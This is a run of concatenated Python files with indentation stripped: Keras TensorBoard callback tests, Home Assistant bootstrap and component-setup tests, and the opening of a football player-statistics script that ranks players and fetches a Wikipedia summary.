instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_outerProfiler(self):
"""Runs a profiler session that interferes with the one from the callback.
The callback will not generate a profile but execution will proceed without
crashing due to unhandled exceptions.
"""
tf.profiler.experimental.start(logdir='')
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
tf.profiler.experimental.stop(save=False)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.logdir))
# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
tf.__internal__.train.update_checkpoint_state(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
|
test_bootstrap.py
|
"""Test the bootstrapping."""
# pylint: disable=protected-access
import os
from unittest import mock
import threading
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.const import EVENT_HOMEASSISTANT_START
import homeassistant.config as config_util
from homeassistant import bootstrap, loader
import homeassistant.util.dt as dt_util
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA
from homeassistant.helpers import discovery
from tests.common import \
get_test_home_assistant, MockModule, MockPlatform, \
assert_setup_component, patch_yaml_files, get_test_config_dir
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)
_LOGGER = logging.getLogger(__name__)
class TestBootstrap:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Setup the test."""
self.backup_cache = loader._COMPONENT_CACHE
if method == self.test_from_config_file:
return
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
if method == self.test_from_config_file:
return
dt_util.DEFAULT_TIME_ZONE = ORIG_TIMEZONE
self.hass.stop()
loader._COMPONENT_CACHE = self.backup_cache
if os.path.isfile(VERSION_PATH):
os.remove(VERSION_PATH)
@mock.patch(
# prevent .HA_VERISON file from being written
'homeassistant.bootstrap.conf_util.process_ha_config_upgrade',
autospec=True)
@mock.patch('homeassistant.util.location.detect_location_info',
autospec=True, return_value=None)
def test_from_config_file(self, mock_upgrade, mock_detect):
"""Test with configuration file."""
components = ['browser', 'conversation', 'script']
files = {
'config.yaml': ''.join(
'{}:\n'.format(comp)
for comp in components
)
}
with mock.patch('os.path.isfile', mock.Mock(return_value=True)), \
mock.patch('os.access', mock.Mock(return_value=True)), \
patch_yaml_files(files, True):
self.hass = bootstrap.from_config_file('config.yaml')
components.append('group')
assert sorted(components) == sorted(self.hass.config.components)
def test_handle_setup_circular_dependency(self):
"""Test the setup of circular dependencies."""
loader.set_component('comp_b', MockModule('comp_b', ['comp_a']))
def setup_a(hass, config):
"""Setup the another component."""
bootstrap.setup_component(hass, 'comp_b')
return True
loader.set_component('comp_a', MockModule('comp_a', setup=setup_a))
bootstrap.setup_component(self.hass, 'comp_a')
assert ['comp_a'] == self.hass.config.components
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({
'comp_conf': {
'hello': str
}
}, required=True)
loader.set_component(
'comp_conf', MockModule('comp_conf', config_schema=config_schema))
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {})
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': None
})
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': {}
})
with assert_setup_component(0):
assert not bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
}
})
def test_validate_platform_config(self):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
loader.set_component(
'platform_conf',
MockModule('platform_conf', platform_schema=platform_schema))
loader.set_component(
'platform_conf.whatever', MockPlatform('whatever'))
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
'platform_conf 2': {
'invalid': True
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'not_existing',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': [{
'platform': 'whatever',
'hello': 'world',
}]
})
self.hass.config.components.remove('platform_conf')
# Any falsey platform config will be ignored (None, {}, etc)
with assert_setup_component(0) as config:
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': None
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
assert bootstrap.setup_component(self.hass, 'platform_conf', {
'platform_conf': {}
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert not bootstrap.setup_component(self.hass, 'non_existing')
def test_component_not_double_initialized(self):
"""Test we do not setup a component twice."""
mock_setup = mock.MagicMock(return_value=True)
loader.set_component('comp', MockModule('comp', setup=mock_setup))
assert bootstrap.setup_component(self.hass, 'comp')
assert mock_setup.called
mock_setup.reset_mock()
assert bootstrap.setup_component(self.hass, 'comp')
assert not mock_setup.called
@mock.patch('homeassistant.util.package.install_package',
return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
loader.set_component(
'comp', MockModule('comp', requirements=['package==0.0.1']))
assert not bootstrap.setup_component(self.hass, 'comp')
assert 'comp' not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not setup twice."""
loader.set_component('comp', MockModule('comp'))
result = []
def setup_component():
"""Setup the component."""
result.append(bootstrap.setup_component(self.hass, 'comp'))
thread = threading.Thread(target=setup_component)
thread.start()
self.hass.config.components.append('comp')
thread.join()
assert len(result) == 1
assert result[0]
def test_component_not_setup_missing_dependencies(self):
"""Test we do not setup a component if not all dependencies loaded."""
deps = ['non_existing']
loader.set_component('comp', MockModule('comp', dependencies=deps))
assert not bootstrap.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
loader.set_component('non_existing', MockModule('non_existing'))
assert bootstrap.setup_component(self.hass, 'comp', {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
loader.set_component(
'comp', MockModule('comp', setup=lambda hass, config: False))
assert not bootstrap.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Setup that raises exception."""
raise Exception('fail!')
loader.set_component('comp', MockModule('comp', setup=exception_setup))
assert not bootstrap.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_home_assistant_core_config_validation(self):
"""Test if we pass in wrong information for HA conf."""
# Extensive HA conf validation testing is done in test_config.py
assert None is bootstrap.from_config_dict({
'homeassistant': {
'latitude': 'some string'
}
})
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Setup method that tests config is passed in."""
if config.get('comp_a', {}).get('valid', False):
return True
raise Exception('Config not passed in: {}'.format(config))
loader.set_component('comp_a',
MockModule('comp_a', setup=config_check_setup))
loader.set_component('switch.platform_a', MockPlatform('comp_b',
['comp_a']))
bootstrap.setup_component(self.hass, 'switch', {
'comp_a': {
'valid': True
},
'switch': {
'platform': 'platform_a',
}
})
assert 'comp_a' in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend({
'valid': True,
}, extra=vol.PREVENT_EXTRA)
mock_setup = mock.MagicMock(spec_set=True)
loader.set_component(
'switch.platform_a',
MockPlatform(platform_schema=platform_schema,
setup_platform=mock_setup))
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'invalid': True
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True,
'invalid_extra': True,
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True
}
})
assert mock_setup.call_count == 1
def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: None))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: False))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: True))
assert bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' in self.hass.config.components
def test_all_work_done_before_start(self):
"""Test all init work done till start."""
call_order = []
def component1_setup(hass, config):
"""Setup mock component."""
discovery.discover(hass, 'test_component2',
component='test_component2')
discovery.discover(hass, 'test_component3',
component='test_component3')
return True
def component_track_setup(hass, config):
"""Setup mock component."""
call_order.append(1)
return True
loader.set_component(
'test_component1',
MockModule('test_component1', setup=component1_setup))
loader.set_component(
'test_component2',
MockModule('test_component2', setup=component_track_setup))
loader.set_component(
'test_component3',
MockModule('test_component3', setup=component_track_setup))
@callback
def track_start(event):
"""Track start event."""
call_order.append(2)
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start)
self.hass.loop.run_until_complete = \
lambda _: self.hass.block_till_done()
bootstrap.from_config_dict({'test_component1': None}, self.hass)
self.hass.start()
assert call_order == [1, 1, 2]
|
script.py
|
# IMPORTS
from tkinter.filedialog import askopenfilename
import json
import importlib
import threading
import time
from tabulate import tabulate
import numpy as np
import matplotlib.pyplot as plt
import os
import shutil
import webbrowser
from wikipedia import wikipedia
import colorama
from termcolor import cprint
from win10toast import ToastNotifier
# CLASS CONTANING GLOBAL VARIABLES
class GlobalVariables:
totalGoals = 0
totalAssists = 0
statObjectsList = []
completePlayerStats = []
tour = type
dictFilename = ""
txtFilename = ""
pathDelimiter = "../"
tkinterFilePath = ""
maxPercentageGoalInvolvement = 0
mostValuablePlayer = ""
mostValuablePlayerWikiInfo = ""
AG_PlayerDataDict = {}
HM_PlayerDataDict = {}
NS_PlayerDataDict = {}
TZ_PlayerDataDict = {}
script_helper = type
Search_Number = 0
# CLASS FOR CALCULATING PLAYER STATS
class PlayerStats():
def __init__(self, name, goals, assists):
self.name = name
self.goals = goals
self.assists = assists
self.percentage_goal_involvement = np.around(((self.goals*3 + self.assists*2) / (
GlobalVariables.totalGoals*3 + GlobalVariables.totalAssists*2) * 100), decimals=2)
self.single_player_complete_stat = []
self.single_player_complete_stat.extend(
[self.name, self.goals, self.assists, self.percentage_goal_involvement])
GlobalVariables.completePlayerStats.append(
self.single_player_complete_stat)
if self.percentage_goal_involvement > GlobalVariables.maxPercentageGoalInvolvement:
GlobalVariables.maxPercentageGoalInvolvement = self.percentage_goal_involvement
GlobalVariables.mostValuablePlayer = self.name
# FINDING LAST MODIFIED FILE
def get_new_file(filesPath):
filename = ""
cont = 'n'
list_of_files = os.listdir(filesPath)
if len(list_of_files) == 0:
print("\nUnable to find any file")
else:
modified_time_of_new_file = np.format_float_scientific(
os.path.getmtime(filesPath+list_of_files[0]))
filename = list_of_files[0]
for i in list_of_files:
mtime = np.format_float_scientific(os.path.getmtime(filesPath+i))
if mtime > modified_time_of_new_file:
modified_time_of_new_file = mtime
filename = i
if filename.endswith(".txt"):
print("\nNew file found: ", filename)
cont = input("Continue? (y/n): ").lower().strip()
else:
print("\nUnable to find any file")
cont = 'n'
if cont == 'y' or cont == '':
return filename
elif cont == 'n':
manual_file_select = input(
"Enter filename manually (eg. jan1) or Enter to skip: ").lower().strip()
manual_file_select = manual_file_select+".txt"
if manual_file_select not in list_of_files:
print("Cannot find", manual_file_select+". Opening filepicker")
abs_txt_path = askopenfilename(
filetypes=[('Text Document', '*.txt')])
tfilename = str(abs_txt_path).split('/')[-1]
GlobalVariables.tkinterFilePath = abs_txt_path
return tfilename
else:
return manual_file_select
else:
raise Exception("Invalid input. Exiting")
# MAKE A COPY OF FILE IF THE FILE IS CHOSEN WITH tkinter
def write_to_file(tkinter_chosen_file_path):
if tkinter_chosen_file_path != GlobalVariables.pathDelimiter+"files/"+GlobalVariables.txtFilename:
shutil.copyfile(tkinter_chosen_file_path,
GlobalVariables.pathDelimiter+"files/"+GlobalVariables.txtFilename)
# TO GET THE RESPECTIVE WORKING DICTIONARY FROM script_helper.py
def get_working_dict_from_helper():
GlobalVariables.script_helper = importlib.import_module("script_helper")
GlobalVariables.tour, GlobalVariables.dictFilename = GlobalVariables.script_helper.get_working_dict(
GlobalVariables.txtFilename)
# CALCULATING TOTAL GOALS
def sum_of_goals(every_player_stats):
goal_list = []
goal_list = np.array(goal_list)
for i in every_player_stats:
goal_list = np.append(goal_list, i[1])
return (int(np.sum(goal_list)))
# CALCULATING TOTAL ASSISTS
def sum_of_assists(every_player_stats):
assist_list = []
assist_list = np.array(assist_list)
for i in every_player_stats:
assist_list = np.append(assist_list, i[2])
return (int(np.sum(assist_list)))
# DOING WIKIPEDIA SEARCH ON MVP
def wiki_search():
while GlobalVariables.Search_Number < 3:
search_term = GlobalVariables.mostValuablePlayer
category = "football"
try:
keyword = wikipedia.search(search_term)[
GlobalVariables.Search_Number]
WikiInfo = str(wikipedia.summary(
keyword, sentences=2, auto_suggest=False))
if WikiInfo.lower().find(category) != -1:
GlobalVariables.mostValuablePlayerWikiInfo = WikiInfo
return
else:
GlobalVariables.Search_Number += 1
wiki_search()
except:
GlobalVariables.mostValuablePlayerWikiInfo = "None"
# SAVING EVERY PLAYER'S TOTAL STATS
def record_player_stats(list_element, player_dict, alph):
if player_dict != {}:
if list_element[0] in player_dict.keys():
goal_updated = player_dict[list_element[0]][0] + list_element[1]
